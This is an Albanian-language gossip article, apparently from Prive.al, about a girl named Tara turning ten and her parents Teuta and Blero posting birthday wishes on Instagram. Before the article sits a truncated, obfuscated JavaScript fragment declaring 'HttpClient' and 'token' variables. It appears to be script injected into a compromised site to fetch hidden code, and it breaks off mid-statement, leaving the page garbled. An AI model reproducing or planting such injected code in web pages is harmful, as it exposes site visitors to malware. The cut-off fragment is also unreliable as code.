;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tara feston ditëlindjen, merr urimet më të bukura nga prindërit

By

Tara festoi sot ditëlindjen e saj të 10-të dhe urimet më të bukura i morri nga prindërit e saj, Teuta dhe Blero.

Kjo ditëlindje do të ishte një nga ditëlindjet e saj më të veçanta, sepse Tara ende pa mbushur 10 vjet hodhi hapat e saj të parë drejt një karriere shumë premtuese si moderatore.

View this post on Instagram

Babë KRENAR #gjirafaVideo #savethechildren

A post shared by BLERO (@bleromuharremi) on

Blero dhe Teuta nuk mund të ishin më krenarë!

“Para 10 viteve, në ora 09:15 linde ti, Tara, mrekullia ime. Nga ai sekondë kur dëgjova të qarën tënde të parë, ndjeva trupin tënd të ngrohtë e të brishtë në gjirin tim, gjithë jeta ime mori kuptim. Për këtë dekadë, ti je ajo që më lumturon çdo ditë të jetës, je motivi im, krenaria ime, shpirti i shpirtit tim, gëzimi im. Nuk e di çfarë të mire kam bërë në këtë jetë që më bekoj Zoti me ty, vajzë kaq e mbarë, me shpirt të bardhë e kaq e dashur. Mund të shkruaj pa u ndalur për ty, për mirësinë tënde, por asnjëherë nuk do të arrij me fjalë ta shpreh gjithë dashurinë që kam për ty. I lutem Zotit të të bekoj me shëndet, dashuri të pafund, mbarësi në çdo aspekt të jetës, fat, suksese, gëzime dhe lumturi, bashkë me gjithë njerëzit tu dashur. Faleminderit që je kjo që je. Nuk do të ndryshoja kurrë asnjë gjë te ti, sepse kështu siç je, je mrekullia vet. Urime ditëlindja shpirti i mamit, të dua pa kufi, kryevepra ime” – shkruan Teuta në një postim të saj në Instagram, dedikuar ditëlindjes së vajzës së saj.

Urimi nga babi Blero nuk kishte si të mungonte i cili shkruan, “Drita e syve të mi. Ti sot i mbushë 10 vjeç dhe i lutem Zotit që ti besh vite të lumtura me shëndet e gjithmonë e rrethume me dashni. Për një baba që është beku me një femijë si ti është shume e lehtë të shkruaj urime e përgëzime, sepse ti je një vajze e mbarë e me krejtë të mirat që një prind i ëndërron për fëmijën e vet. Sot 10 vite ti linde dhe me ty lindi jeta për mua dhe gjithçka mori kuptim. Edhe pse s’mund të përqafoj dhe të të them sa të dua nga afër, rëndësi për mua ka vetëm shëndeti yt dhe mirëqenia jote! Do kemi kohë çpufja ime që të festojmë shumë e shumë ditëlindje bashkë, dhashtë Zoti. Ti je krenaria ime, drita e syve të mi. Babi të uron gjithçka të bukur nga zemra!

Tara, urime ditëlindjen edhe 100! /Prive.al

 

Artikuj të ngjashëm